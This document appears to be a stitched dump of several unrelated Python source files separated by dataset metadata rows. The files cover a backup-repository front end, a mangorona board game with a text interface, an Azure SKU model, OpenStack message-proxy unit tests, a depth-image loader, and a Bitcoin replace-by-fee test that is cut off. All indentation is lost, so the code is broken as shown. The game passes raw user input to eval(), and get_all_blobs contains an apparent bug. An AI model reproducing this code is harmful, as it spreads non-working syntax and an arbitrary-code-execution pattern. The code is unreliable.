self.blobs_to_verify = []
self.loadstats = {}
def allows_permanent_erase(self):
return self.repo.allows_permanent_erase()
def get_session_ids(self, session_name = None):
sids = self.repo.get_all_sessions()
if not session_name:
return sids
result = []
for sid in sids:
session_info = self.get_session_info(sid)
name = session_info.get("name")
if name == session_name:
result.append(sid)
return result
def get_session_names(self, include_meta = False):
sessions_count = {}
for sid in self.get_session_ids():
session_info = self.get_session_info(sid)
name = session_info.get("name", "<no name>")
if not include_meta and name.startswith("__"):
continue
sessions_count[name] = sessions_count.get(name, 0) + 1
return sessions_count.keys()
def get_deleted_snapshots(self):
return self.repo.get_deleted_snapshots()
def get_dedup_block_size(self):
return repository.DEDUP_BLOCK_SIZE
def get_dedup_block_location(self, sha):
return self.repo.get_block_location(sha)
def get_deleted_snapshot_info(self, rev):
""" Returns a tuple containing the snapshot deleted_name and
deleted_fingerprint. """
assert self.repo.has_snapshot(rev)
session_reader = self.repo.get_session(rev)
properties = session_reader.get_properties()
assert properties['client_data']['name'] == "__deleted", \
"Cannot get deleted snapshot info for not-deleted snapshots"
return properties.get('deleted_name', None), properties.get('deleted_fingerprint', None)
def __set_session_property(self, session_name, property_name, new_value):
assert property_name in valid_session_props
meta_session_name = "__meta_" + session_name
if self.find_last_revision(meta_session_name) == None:
self.__mksession(meta_session_name)
value_string = json.dumps(new_value, indent = 4)
assert value_string == json.dumps(new_value, indent = 4), "Memory corruption?"
set_file_contents(self, meta_session_name, property_name + ".json", value_string)
def __get_session_property(self, session_name, property_name):
"""Returns the value of the given session property, or None if
there is no such property."""
assert property_name in valid_session_props
meta_session_name = "__meta_" + session_name
try:
value_string = get_file_contents(self, meta_session_name, property_name + ".json")
except SessionNotFoundError:
return None
if value_string == None:
return None
return json.loads(value_string)
def set_session_ignore_list(self, session_name, new_list):
assert isinstance(new_list, (tuple, list)), new_list
self.__set_session_property(session_name, "ignore", new_list)
def get_session_ignore_list(self, session_name):
value = self.__get_session_property(session_name, "ignore")
if value == None:
return []
return value
def set_session_include_list(self, session_name, new_list):
assert isinstance(new_list, (tuple, list)), new_list
self.__set_session_property(session_name, "include", new_list)
def get_session_include_list(self, session_name):
value = self.__get_session_property(session_name, "include")
if value == None:
return []
return value
def get_session_info(self, id):
""" Returns None if there is no such snapshot """
if not self.repo.has_snapshot(id):
return None
session_reader = self.repo.get_session(id)
properties = session_reader.get_properties()
return properties['client_data']
def get_base_id(self, id):
session_reader = self.repo.get_session(id)
baseid = session_reader.get_base_id()
return baseid
def get_predecessor(self, id):
info = self.get_session_info(id)
assert info, "No such revision"
session_name = info['name']
ids = self.get_session_ids(session_name)
ids.sort()
pos = ids.index(id)
assert pos >= 0
if pos == 0:
return None
return ids[pos - 1]
def get_session_fingerprint(self, id):
session_reader = self.repo.get_session(id)
properties = session_reader.get_properties()
assert "fingerprint" in properties
return properties["fingerprint"]
def get_session_bloblist(self, id):
session_reader = self.repo.get_session(id)
bloblist = list(session_reader.get_all_blob_infos())
seen = set()
for b in bloblist:
assert b['filename'] not in seen, "Duplicate file found in bloblist - internal error"
seen.add(b['filename'])
self.loadstats[id] = session_reader.load_stats
return bloblist
def get_session_load_stats(self, id):
"""Returns the load stats dict for the given session. The
return value may be None if the session instance has not
yet loaded its bloblist."""
return copy.copy(self.loadstats.get(id, None))
def get_session_raw_bloblist(self, id):
session_reader = self.repo.get_session(id)
return copy.copy(session_reader.get_raw_bloblist())
def get_stats(self):
return self.repo.get_stats()
def create_session(self, session_name, base_session = None, force_base_snapshot = False):
"""Creates a new snapshot for the given session. Commit() must
be called when the construction of the new snapshot is
completed()."""
assert isinstance(session_name, basestring), session_name
assert not self.new_session, "There already exists an active new snapshot"
self.new_session = self.repo.create_snapshot(session_name = session_name,
base_session = base_session,
force_base_snapshot = force_base_snapshot)
def create_base_snapshot(self, session_name, truncate = False):
assert not self.new_session
assert truncate in (True, False)
with self.repo:
sid = self.find_last_revision(session_name)
assert sid, "No such session: %s" % session_name
old_fingerprint = self.get_session_fingerprint(sid)
self.create_session(session_name, base_session = sid, force_base_snapshot = True)
if truncate:
if not self.repo.allows_permanent_erase():
raise UserError("This repository does not allow destructive changes.")
snapshots_to_erase = self.get_session_ids(session_name)
self.new_session.erase_snapshots(snapshots_to_erase)
new_sid = self.commit(session_name)
new_fingerprint = self.get_session_fingerprint(new_sid)
assert old_fingerprint == new_fingerprint
assert self.repo.get_session(new_sid).get_base_id() == None
return new_sid
def truncate(self, session_name):
return self.create_base_snapshot(session_name, truncate = True)
def erase_snapshots(self, snapshot_ids):
assert self.new_session, "erasing snapshots requires a new snapshot"
self.new_session.erase_snapshots(snapshot_ids)
def erase_orphan_blobs(self):
with self.repo:
return self.repo.erase_orphan_blobs()
def cancel_snapshot(self):
if not self.new_session:
warn("Tried to cancel non-active new snapshot")
return
try:
self.new_session.cancel()
finally:
self.new_session = None
def has_snapshot(self, session_name, snapshot_id):
""" Returns True if there exists a session with the given
session_name and snapshot id """
if snapshot_id not in self.get_session_ids():
return False
session_info = self.get_session_info(snapshot_id)
name = session_info.get("name", None)
return name == session_name
def get_highest_used_revision(self):
return self.repo.get_highest_used_revision()
def is_deleted(self, snapshot_id):
""" Returns True if the given snapshot used to exist, but has
been explicitly deleted."""
return self.repo.is_deleted(snapshot_id)
def init_new_blob(self, blob_md5, size):
self.new_session.init_new_blob(blob_md5, size)
def get_all_rolling(self):
return self.repo.blocksdb.get_all_rolling()
def has_block(self, sha256):
return self.repo.blocksdb.has_block(sha256)
def add_blob_data(self, blob_md5, b64data):
""" Must be called after a create_session() """
self.new_session.add_blob_data(blob_md5, base64.b64decode(b64data))
def add_blob_data_streamed(self, blob_md5, datasource):
import hashlib, common
assert is_md5sum(blob_md5)
summer = hashlib.md5()
total = datasource.bytes_left()
while datasource.bytes_left() > 0:
# repository.DEDUP_BLOCK_SIZE is a reasonable size - no other reason
block = datasource.read(repository.DEDUP_BLOCK_SIZE)
summer.update(block)
self.new_session.add_blob_data(blob_md5, block)
if summer.hexdigest() != blob_md5:
raise common.ContentViolation("Received blob data differs from promised.")
def blob_finished(self, blob_md5):
self.new_session.blob_finished(blob_md5)
def add(self, metadata):
""" Must be called after a create_session(). Adds a link to a existing
blob. Will throw an exception if there is no such blob """
assert metadata.has_key("md5sum")
assert metadata.has_key("filename")
self.new_session.add(metadata)
def remove(self, filename):
"""Mark the given file as deleted in the snapshot currently
under construction."""
assert self.new_session
self.new_session.remove(filename)
def __mksession(self, session_name):
"""Create a new session. For internal use. Allows names that
starts with "__", but throws UserError for invalid names or if
the session already exists. """
if self.find_last_revision(session_name) != None:
raise Exception("There already exists a session named '%s'" % (session_name))
if session_name.strip() != session_name:
raise UserError("Session names must not begin or end with whitespace.")
if session_name == "":
raise UserError("Session names must not be empty")
if "/" in session_name:
raise UserError("Session names must not contain slashes.")
if "\\" in session_name:
raise UserError("Session names must not contain backslashes.")
if self.find_last_revision(session_name) != None:
raise UserError("There already exists a session named '%s'" % (session_name))
self.create_session(session_name = session_name)
return self.commit_raw(session_name, None, int(time()), ctime())
def mksession(self, session_name):
"""Create a new session. Throws a UserError for invalid
session names and if the session already exists."""
if session_name.startswith("__"):
raise UserError("Session names must not begin with double underscores.")
return self.__mksession(session_name)
def commit_deleted_snapshot(self, deleted_name, deleted_fingerprint):
self.new_session.deleted_snapshot(deleted_name, deleted_fingerprint)
rev = self.new_session.commit({'name': '__deleted'})
self.new_session = None
return rev
def commit_raw(self, session_name, log_message, timestamp, date, progress_callback = lambda x: None):
"""Commit a snapshot. For internal use. The session does not
need to exist beforehand."""
assert self.new_session, "There is no active snapshot to commit"
assert timestamp == None or type(timestamp) == int
session_info = {}
session_info["name"] = session_name
if timestamp:
session_info["timestamp"] = timestamp
session_info["date"] = date
if log_message:
session_info["log_message"] = log_message
rev = self.new_session.commit(session_info, progress_callback)
self.new_session = None
return rev
def commit(self, session_name, log_message = None, progress_callback = lambda x: None):
"""Commit a snapshot started with create_snapshot(). The session must
exist beforehand. Accepts an optional log message."""
if log_message != None:
assert type(log_message) == unicode, "Log message must be in unicode"
assert type(session_name) == unicode
if not self.find_last_revision(session_name):
raise UserError("Session '%s' does not seem to exist in the repo." % (session_name))
return self.commit_raw(session_name, log_message, int(time()), ctime(), progress_callback = progress_callback)
def get_blob_size(self, sum):
return self.repo.get_blob_size(sum)
def get_blob(self, sum, offset = 0, size = None):
datasource = self.repo.get_blob_reader(sum, offset, size)
return datasource
def has_blob(self, sum):
return self.repo.has_blob(sum)
def get_all_blobs(self):
""" Returns a list of all blobs (raw or recipes) in the
repository. This method is deprecated. Use get_all_raw_blobs()
and/or get_all_recipes() instead."""
return self.get_all_raw_blobs() + self.get_all_raw_blobs(self)
def get_all_raw_blobs(self):
return self.repo.get_raw_blob_names()
def get_all_recipes(self):
return self.repo.get_recipe_names()
def new_snapshot_has_blob(self, sum):
assert self.new_session, "new_snapshot_has_blob() must only be called when a new snapshot is underway"
return self.new_session.has_blob(sum)
def find_last_revision(self, session_name):
""" Returns the id of the latest snapshot in the specified
session. Returns None if there is no such session. """
return self.repo.find_last_revision(session_name)
def init_verify_blobs(self):
assert self.blobs_to_verify == []
self.blobs_to_verify = self.repo.get_raw_blob_names() + self.repo.get_recipe_names()
for scanner in self.repo.scanners:
scanner.scan_init()
return len(self.blobs_to_verify)
def verify_some_blobs(self):
succeeded = []
count = min(100, len(self.blobs_to_verify))
for i in range(0, count):
blob_to_verify = self.blobs_to_verify.pop()
if not self.repo.verify_blob(blob_to_verify):
raise CorruptionError("Blob corrupted: " + blob_to_verify)
succeeded.append(blob_to_verify)
if not self.blobs_to_verify:
for scanner in self.repo.scanners:
scanner.scan_finish()
return succeeded
def repo_get_highest_used_revision(self):
return self.repo.get_highest_used_revision()
def repo_verify_snapshot(self, rev):
return self.repo.verify_snapshot(rev)
def acquire_repo_lock(self):
self.repo.repo_mutex.lock()
def release_repo_lock(self):
self.repo.repo_mutex.release()
def get_repo_identifier(self):
return self.repo.get_repo_identifier()
def deduplication_enabled(self):
return self.repo.deduplication_enabled()
class DryRunFront:
def __init__(self, front):
self.realfront = front
def get_session_ids(self):
return self.realfront.get_session_ids()
def get_session_info(self, id):
return self.realfront.get_session_properties(id)['client_data']
def get_session_bloblist(self, id):
return self.realfront.get_session_bloblist(id)
def create_session(self, session_name, base_session = None, force_base_snapshot = False):
pass
def init_new_blob(self, blob_md5, size):
pass
def add_blob_data(self, blob_md5, b64data):
pass
def get_all_rolling(self):
return []
def add_blob_data_streamed(self, blob_md5=None, progress_callback=None, datasource=None):
while datasource.remaining:
datasource.read(2**12)
def blob_finished(self, blob_md5):
pass
def add(self, metadata):
pass
def remove(self, filename):
pass
def commit(self, session_name, log_message = None, progress_callback = None):
return 0
def get_blob_size(self, sum):
return self.realfront.get_blob_size(sum)
def get_blob_b64(self, sum, offset = 0, size = None):
return self.realfront.get_blob_b64(sum, offset, size)
def has_blob(self, sum):
return self.realfront.has_blob(sum)
def new_snapshot_has_blob(self, sum):
return False
def find_last_revision(self, session_name):
return self.realfront.find_last_revision(session_name)
def mksession(self, session_name):
pass
for attrib in Front.__dict__:
if not attrib.startswith("_") and callable(Front.__dict__[attrib]):
if not attrib in DryRunFront.__dict__:
pass
#warn("Missing in DryRunFront: "+ attrib)
| apache-2.0 | 9,191,154,933,669,040,000 | 41.134094 | 118 | 0.628961 | false |
nirinA/scripts_python | mangorona.py | 1 | 12832 | '''game of mangorona.
goal:
keep more pawn on the board than your opponent.
movement:
move your pawn to an unoccupied place.
pick:
fill or create an empty place beetwen your pawn and
your opponent's, and pick all opponent pawn in the
same line of movement.
'''
import sys
import random
import time
import profile
import traceback
class IllegalMove(Exception):
pass
class NoMoreMove(Exception):
pass
class Init(object):
def __init__(self, dimension, players, lattice):
self.dimension = dimension
self.xmax, self.ymax = dimension
self.player1, self.player2, self.blank = players
self.lattice = lattice
self.all = [(x,y) for x in range(self.xmax) for y in range(self.ymax)]
self.gain = {self.player1:0, self.player2:0}
class Position(Init):
'''get all positions around one point'''
def __init__(self, p, dimension, lattice):
Init.__init__(self, dimension, ('','',''), lattice)
self.xi, self.yi = p
##'''pawn can move only horizontally '''
self.p1 = self.xi+1, self.yi
self.p2 = self.xi-1, self.yi
##'''pawn can move only verticaly'''
self.p3 = self.xi, self.yi+1
self.p4 = self.xi, self.yi-1
##'''pawn can also move diagonaly'''
self.p5 = self.xi-1, self.yi-1
self.p6 = self.xi-1, self.yi+1
self.p7 = self.xi+1, self.yi-1
self.p8 = self.xi+1, self.yi+1
if lattice is None:
if sum(p)%2:
self.around = self.p1,self.p2,self.p3,self.p4
else:
self.around = self.p1,self.p2,self.p3,self.p4,\
self.p5,self.p6,self.p7,self.p8
elif lattice == 'star':
if sum(p)%2:
self.around = self.p1,self.p2,self.p3,self.p4
else:
self.around = self.p1,self.p2,self.p3,self.p4,\
self.p5,self.p6,self.p7,self.p8
elif lattice == 'diamond':
if sum(p)%2:
self.around = self.p1,self.p2,self.p3,self.p4,\
self.p5,self.p6,self.p7,self.p8
else:
self.around = self.p1,self.p2,self.p3,self.p4
elif lattice == 'cubic':
self.around = self.p1,self.p2,self.p3,self.p4
elif lattice == 'web':
self.around = self.p1,self.p2,self.p3,self.p4,\
self.p5,self.p6,self.p7,self.p8
elif lattice == 'X':
self.around = self.p5,self.p6,self.p7,self.p8
def Movable(self):
return [p for p in self.around if p in self.all]
def Deletable(self, final):
xf, yf = final
deltax = xf - self.xi
deltay = yf - self.yi
removeup = []
removedown = []
xu = xd = self.xi
yu = yd = self.yi
while (0<=xu<=self.xmax) and (0<=yu<=self.ymax):
xu += deltax
yu += deltay
removeup.append((xu,yu))
removeup.remove((xf, yf))
while (0<=xd<=self.xmax) and (0<=yd<=self.ymax):
xd -= deltax
yd -= deltay
removedown.append((xd,yd))
return [xy for xy in removeup if xy in self.all],\
[xy for xy in removedown if xy in self.all]
class Mangorona(Init):
def __init__(self, players, lattice, dimension, matrix=None):
'''set matrix to None to create an initial board with self.Create'''
if matrix is None:
self.matrix = self.Create(dimension, players)
else:
self.matrix = matrix
Init.__init__(self, (len(self.matrix), len(self.matrix[0])), players, lattice)
def Create(self, dimension, players):
xmax, ymax = dimension
player1, player2, blank = players
m =[[None for i in range(ymax)] for j in range(xmax)]
for x in range(xmax):
for y in range(ymax):
if (x < int(xmax/2)):
m[x][y]=player1
elif (x == int(xmax/2)):
if (y < int(ymax/2)):
if y%2 != 0:
m[x][y]=player2
else:
m[x][y]=player1
elif (y == int(ymax/2)):
m[x][y]=blank
else:
if y%2 != 0:
m[x][y]=player1
else:
m[x][y]=player2
else:
m[x][y]=player2
return m
def Zero(self):
'''return the position(s) of blank'''
w = []
for i in range(self.xmax):
c = self.matrix[i].count(self.blank)
s = 0
while c > 0:
n = self.matrix[i].index(self.blank, s)
w.append((i, n))
s = n + 1
c -= 1
return w
def Pawn(self, position, turn):
x, y = position
if self.matrix[x][y] == turn:
return True
return False
def MovablePawn(self, turn):
movable = []
wherezero = self.Zero()
for p in wherezero:
pos = Position(p, self.dimension, self.lattice)
turnmovable = [i for i in pos.Movable() if self.Pawn(i,turn)]
movable.extend(turnmovable)
return movable
def ChangePawn(self, turn, initial, final):
xi, yi = initial
xf, yf = final
self.matrix[xi][yi]=self.blank
self.matrix[xf][yf]=turn
todelete = Position(initial, self.dimension, self.lattice).Deletable(final)
for t in todelete:
for p in t:
x,y = p
if (not self.Pawn(p, turn) and self.matrix[x][y] != self.blank):
self.matrix[x][y] = self.blank
self.gain[turn] += 1
else:
break
def Move(self, turn, initial, final):
if initial == final:
raise IllegalMove("you don't move")
if not self.Pawn(initial, turn):
raise IllegalMove('not your pawn')
if final not in self.Zero():
raise IllegalMove('destination must be empty')
if initial not in self.MovablePawn(turn):
raise IllegalMove('this pawn cannot move')
if final not in Position(initial, self.dimension, self.lattice).around:
raise IllegalMove('not allowable move')
self.ChangePawn(turn, initial, final)
def Winner(self):
if self.gain[self.player1]<self.gain[self.player2]:
return self.player2
elif self.gain[self.player1]>self.gain[self.player2]:
return self.player1
else:
return self.blank
class AllowableMovement(object):
def __init__(self, m, turn):
self.m = m.matrix
self.blank = m.blank
self.mZero = m.Zero()
self.mMovablePawn = m.MovablePawn(turn)
self.mdimension = m.dimension
self.player = turn
self.mlattice = m.lattice
def Move(self, maximum=False, getall=False):
'''check if the player can move, and used as machine player'''
move = {}
for i in self.mMovablePawn:
pos = Position(i, self.mdimension, self.mlattice)
listf = [f for f in pos.around if f in self.mZero]
for f in listf:
if getall:
move.update({(i,f):0})
else:
moveup , movedown = pos.Deletable(f)
up = [self.m[x][y] for (x,y) in moveup]
down = [self.m[x][y] for (x,y) in movedown]
if self.blank in up:
up = up[:up.index(self.blank)]
if self.player in up:
up = up[:up.index(self.player)]
if self.blank in down:
down = down[:down.index(self.blank)]
if self.player in down:
down = down[:down.index(self.player)]
get = len(up+down)
if get>0:
move.update({(i,f):get})
if move:
if maximum:
getmax = max(move.values())
for k in list(move.keys()):
if move[k]<getmax:
move.pop(k)
return list(move.keys())
else:
raise NoMoreMove('%s cannot move anymore'%self.player)
class Board(object):
'''displaying the game in command line mode'''
def __init__(self, m):
self.m = m.matrix
self.x = m.xmax
self.y = m.ymax
self.evenline = [chr(92), '/']
self.oddline = ['/', chr(92)]
if m.lattice == 'diamond':
self.evenline.reverse()
self.oddline.reverse()
if m.lattice == 'cubic':
self.evenline = [' ', ' ']
self.oddline = [' ', ' ']
if m.lattice == 'web':
self.evenline = ['x', 'x']
self.oddline = ['x', 'x']
def WidthLine(self, listline):
if self.y%2==0:
return ' |%s|'%'|'.join(listline*int(self.y/2))[:-2]
return ' |%s|'%'|'.join(listline*int(self.y/2))
def Inline(self, i):
if i%2==0:
return self.WidthLine(self.evenline)
if i%2!=0:
return self.WidthLine(self.oddline)
def Display(self):
d = ' '+' '.join([str(j) for j in range(self.y)])+'\n'
for i in range(self.x):
d += str(i)+' '
d += '-'.join([str(self.m[i][j]) for j in range(self.y)])
d += ' '+str(i)+'\n'
if i!=self.x-1:
d += self.Inline(i)+'\n'
return d+' '+' '.join([str(j) for j in range(self.y)])+'\n'
def MachineMachine():
LATTICE = 'star' ##, 'diamond'
DIMENSION = (5,11)
PLAYERS = 'a', 'b', ' '
##mc = Mangorona(PLAYERS,'cubic', DIMENSION, None)
##maximum=True
##getall=True
mc = Mangorona(PLAYERS,'diamond', (7,11), None)
maximum=True
getall=False
t = PLAYERS[:2]
tab = 0
print(Board(mc).Display())
while True:
try:
turn = t[tab%2]
movable = AllowableMovement(mc, turn).Move(maximum=maximum, getall=getall)
machine = random.choice(movable)
print(turn, 'move:', machine[0], machine[1])
mc.Move(turn, machine[0], machine[1])
print(Board(mc).Display())
print(mc.gain['a'], mc.gain['b']) ##, t1-t0
print()
tab += 1
except IllegalMove:
exc = traceback.format_exception(*sys.exc_info())[-1]
print(exc)
except NoMoreMove:
exc = traceback.format_exception(*sys.exc_info())[-1]
print(exc)
print('winner:', mc.Winner())
break
def TestvsMachine():
LATTICE = 'star'
DIMENSION = 5, 9
PLAYERS = 'a', 'b', ' '
machineplayer = PLAYERS[0]
mc = Mangorona(PLAYERS,LATTICE, DIMENSION, None)
maximum=True
getall=False
t = PLAYERS[:2]
tab = 0
print(Board(mc).Display())
while True:
try:
turn = t[tab%2]
movable = AllowableMovement(mc, turn).Move(maximum=maximum, getall=getall)
if turn == machineplayer:
machine = random.choice(movable)
print(turn, 'move:', machine[0], machine[1])
mc.Move(turn, machine[0], machine[1])
print(Board(mc).Display())
print(mc.gain['a'], mc.gain['b']) ##, t1-t0
print()
tab += 1
else:
h = input("type:'?' for movable, 'z' for Zero, 'h' for rules\nyour move - :")
if h == '?':
print(mc.MovablePawn(turn))
elif h == 'z':
print(mc.Zero())
elif h == 'h':
print(__doc__)
else:
human = eval(h)
if human not in movable:
raise IllegalMove('not allowable move')
mc.Move(turn, human[0], human[1])
print(Board(mc).Display())
tab += 1
except IllegalMove:
exc = traceback.format_exception(*sys.exc_info())[-1]
print(exc)
except NoMoreMove:
exc = traceback.format_exception(*sys.exc_info())[-1]
print(exc)
print('winner:', mc.Winner())
break
except KeyboardInterrupt:
raise SystemExit
except:
traceback.print_exc()
__version__ = '3k-0.0.0'
__author__ = 'nirinA'
__date__ = 'Sat May 10 21:52:15 2008'
| unlicense | 4,551,880,349,135,935,500 | 33.869565 | 93 | 0.488622 | false |
rjschwei/azure-sdk-for-python | azure-mgmt-powerbiembedded/azure/mgmt/powerbiembedded/models/azure_sku.py | 1 | 1111 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class AzureSku(Model):
"""AzureSku.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar name: SKU name. Default value: "S1" .
:vartype name: str
:ivar tier: SKU tier. Default value: "Standard" .
:vartype tier: str
"""
_validation = {
'name': {'required': True, 'constant': True},
'tier': {'required': True, 'constant': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'tier': {'key': 'tier', 'type': 'str'},
}
name = "S1"
tier = "Standard"
| mit | 1,389,177,205,370,494,500 | 27.487179 | 76 | 0.540954 | false |
briancurtin/python-openstacksdk | openstack/tests/unit/message/v2/test_proxy.py | 1 | 9468 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from openstack.message.v2 import _proxy
from openstack.message.v2 import claim
from openstack.message.v2 import message
from openstack.message.v2 import queue
from openstack.message.v2 import subscription
from openstack import proxy2 as proxy_base
from openstack.tests.unit import test_proxy_base2
QUEUE_NAME = 'test_queue'
class TestMessageProxy(test_proxy_base2.TestProxyBase):
def setUp(self):
super(TestMessageProxy, self).setUp()
self.proxy = _proxy.Proxy(self.session)
def test_queue_create(self):
self.verify_create(self.proxy.create_queue, queue.Queue)
def test_queue_get(self):
self.verify_get(self.proxy.get_queue, queue.Queue)
def test_queues(self):
self.verify_list(self.proxy.queues, queue.Queue, paginated=True)
def test_queue_delete(self):
self.verify_delete(self.proxy.delete_queue, queue.Queue, False)
def test_queue_delete_ignore(self):
self.verify_delete(self.proxy.delete_queue, queue.Queue, True)
@mock.patch.object(proxy_base.BaseProxy, '_get_resource')
def test_message_post(self, mock_get_resource):
message_obj = message.Message(queue_name="test_queue")
mock_get_resource.return_value = message_obj
self._verify("openstack.message.v2.message.Message.post",
self.proxy.post_message,
method_args=["test_queue", ["msg1", "msg2"]],
expected_args=[["msg1", "msg2"]])
mock_get_resource.assert_called_once_with(message.Message, None,
queue_name="test_queue")
@mock.patch.object(proxy_base.BaseProxy, '_get_resource')
def test_message_get(self, mock_get_resource):
mock_get_resource.return_value = "resource_or_id"
self._verify2("openstack.proxy2.BaseProxy._get",
self.proxy.get_message,
method_args=["test_queue", "resource_or_id"],
expected_args=[message.Message, "resource_or_id"])
mock_get_resource.assert_called_once_with(message.Message,
"resource_or_id",
queue_name="test_queue")
def test_messages(self):
self.verify_list(self.proxy.messages, message.Message,
paginated=True, method_args=["test_queue"],
expected_kwargs={"queue_name": "test_queue"})
@mock.patch.object(proxy_base.BaseProxy, '_get_resource')
def test_message_delete(self, mock_get_resource):
fake_message = mock.Mock()
fake_message.id = "message_id"
mock_get_resource.return_value = fake_message
self._verify2("openstack.proxy2.BaseProxy._delete",
self.proxy.delete_message,
method_args=["test_queue", "resource_or_id", None,
False],
expected_args=[message.Message,
fake_message],
expected_kwargs={"ignore_missing": False})
self.assertIsNone(fake_message.claim_id)
mock_get_resource.assert_called_once_with(message.Message,
"resource_or_id",
queue_name="test_queue")
@mock.patch.object(proxy_base.BaseProxy, '_get_resource')
def test_message_delete_claimed(self, mock_get_resource):
fake_message = mock.Mock()
fake_message.id = "message_id"
mock_get_resource.return_value = fake_message
self._verify2("openstack.proxy2.BaseProxy._delete",
self.proxy.delete_message,
method_args=["test_queue", "resource_or_id", "claim_id",
False],
expected_args=[message.Message,
fake_message],
expected_kwargs={"ignore_missing": False})
self.assertEqual("claim_id", fake_message.claim_id)
mock_get_resource.assert_called_once_with(message.Message,
"resource_or_id",
queue_name="test_queue")
@mock.patch.object(proxy_base.BaseProxy, '_get_resource')
def test_message_delete_ignore(self, mock_get_resource):
fake_message = mock.Mock()
fake_message.id = "message_id"
mock_get_resource.return_value = fake_message
self._verify2("openstack.proxy2.BaseProxy._delete",
self.proxy.delete_message,
method_args=["test_queue", "resource_or_id", None,
True],
expected_args=[message.Message,
fake_message],
expected_kwargs={"ignore_missing": True})
self.assertIsNone(fake_message.claim_id)
mock_get_resource.assert_called_once_with(message.Message,
"resource_or_id",
queue_name="test_queue")
def test_subscription_create(self):
self._verify("openstack.message.v2.subscription.Subscription.create",
self.proxy.create_subscription,
method_args=["test_queue"])
@mock.patch.object(proxy_base.BaseProxy, '_get_resource')
def test_subscription_get(self, mock_get_resource):
mock_get_resource.return_value = "resource_or_id"
self._verify2("openstack.proxy2.BaseProxy._get",
self.proxy.get_subscription,
method_args=["test_queue", "resource_or_id"],
expected_args=[subscription.Subscription,
"resource_or_id"])
mock_get_resource.assert_called_once_with(
subscription.Subscription, "resource_or_id",
queue_name="test_queue")
def test_subscriptions(self):
self.verify_list(self.proxy.subscriptions, subscription.Subscription,
paginated=True, method_args=["test_queue"],
expected_kwargs={"queue_name": "test_queue"})
@mock.patch.object(proxy_base.BaseProxy, '_get_resource')
def test_subscription_delete(self, mock_get_resource):
mock_get_resource.return_value = "resource_or_id"
self.verify_delete(self.proxy.delete_subscription,
subscription.Subscription, False,
["test_queue", "resource_or_id"])
mock_get_resource.assert_called_once_with(
subscription.Subscription, "resource_or_id",
queue_name="test_queue")
@mock.patch.object(proxy_base.BaseProxy, '_get_resource')
def test_subscription_delete_ignore(self, mock_get_resource):
mock_get_resource.return_value = "resource_or_id"
self.verify_delete(self.proxy.delete_subscription,
subscription.Subscription, True,
["test_queue", "resource_or_id"])
mock_get_resource.assert_called_once_with(
subscription.Subscription, "resource_or_id",
queue_name="test_queue")
def test_claim_create(self):
self._verify("openstack.message.v2.claim.Claim.create",
self.proxy.create_claim,
method_args=["test_queue"])
def test_claim_get(self):
self._verify2("openstack.proxy2.BaseProxy._get",
self.proxy.get_claim,
method_args=["test_queue", "resource_or_id"],
expected_args=[claim.Claim,
"resource_or_id"],
expected_kwargs={"queue_name": "test_queue"})
def test_claim_update(self):
self._verify2("openstack.proxy2.BaseProxy._update",
self.proxy.update_claim,
method_args=["test_queue", "resource_or_id"],
method_kwargs={"k1": "v1"},
expected_args=[claim.Claim,
"resource_or_id"],
expected_kwargs={"queue_name": "test_queue",
"k1": "v1"})
def test_claim_delete(self):
self.verify_delete(self.proxy.delete_claim,
claim.Claim, False,
["test_queue", "resource_or_id"],
expected_kwargs={"queue_name": "test_queue"})
def test_claim_delete_ignore(self):
self.verify_delete(self.proxy.delete_claim,
claim.Claim, True,
["test_queue", "resource_or_id"],
expected_kwargs={"queue_name": "test_queue"})
| apache-2.0 | 4,928,571,807,809,514,000 | 46.577889 | 78 | 0.560097 | false |
vjlux/luxlib | LuxSynth/LuxSynth/LuxPreprocessor.py | 1 | 1130 | #!/usr/bin/env python3
## Copyright (c) MIT. All rights reserved.
## lux ([email protected]) 2016
############################################################
# Imports
############################################################
import logging
import LuxImage
import open3d as o3d
import numpy as np
############################################################
# Globals
############################################################
############################################################
# Classes
############################################################
class LuxPreprocessor(object):
"""Preprocessor class for raw data loading."""
m_outputPath = "./";
m_inputPath = "./";
def __init__(
self,
p_inputPath,
p_outputPath):
self.m_outputPath = p_outputPath;
def LoadDepthFromRGB24bitImage(self, p_depthImageFileName):
#depth = np.array([]);
#color_raw = o3d.io.read_image("../../TestData/RGBD/color/00000.jpg")
depth_raw = o3d.io.read_image(p_depthImageFileName);
return depth_raw; | mit | 3,467,147,251,003,499,000 | 24.704545 | 77 | 0.39646 | false |
chaincoin/chaincoin | qa/rpc-tests/replace-by-fee.py | 1 | 22023 | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test replace by fee code
#
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.script import *
from test_framework.mininode import *
MAX_REPLACEMENT_LIMIT = 100
def txToHex(tx):
return bytes_to_hex_str(tx.serialize())
def make_utxo(node, amount, confirmed=True, scriptPubKey=CScript([1])):
"""Create a txout with a given amount and scriptPubKey
Mines coins as needed.
confirmed - txouts created will be confirmed in the blockchain;
unconfirmed otherwise.
"""
fee = 1*COIN
while node.getbalance() < satoshi_round((amount + fee)/COIN):
node.generate(100)
#print (node.getbalance(), amount, fee)
new_addr = node.getnewaddress()
#print new_addr
txid = node.sendtoaddress(new_addr, satoshi_round((amount+fee)/COIN))
tx1 = node.getrawtransaction(txid, 1)
txid = int(txid, 16)
i = None
for i, txout in enumerate(tx1['vout']):
#print i, txout['scriptPubKey']['addresses']
if txout['scriptPubKey']['addresses'] == [new_addr]:
#print i
break
assert i is not None
tx2 = CTransaction()
tx2.vin = [CTxIn(COutPoint(txid, i))]
tx2.vout = [CTxOut(amount, scriptPubKey)]
tx2.rehash()
signed_tx = node.signrawtransaction(txToHex(tx2))
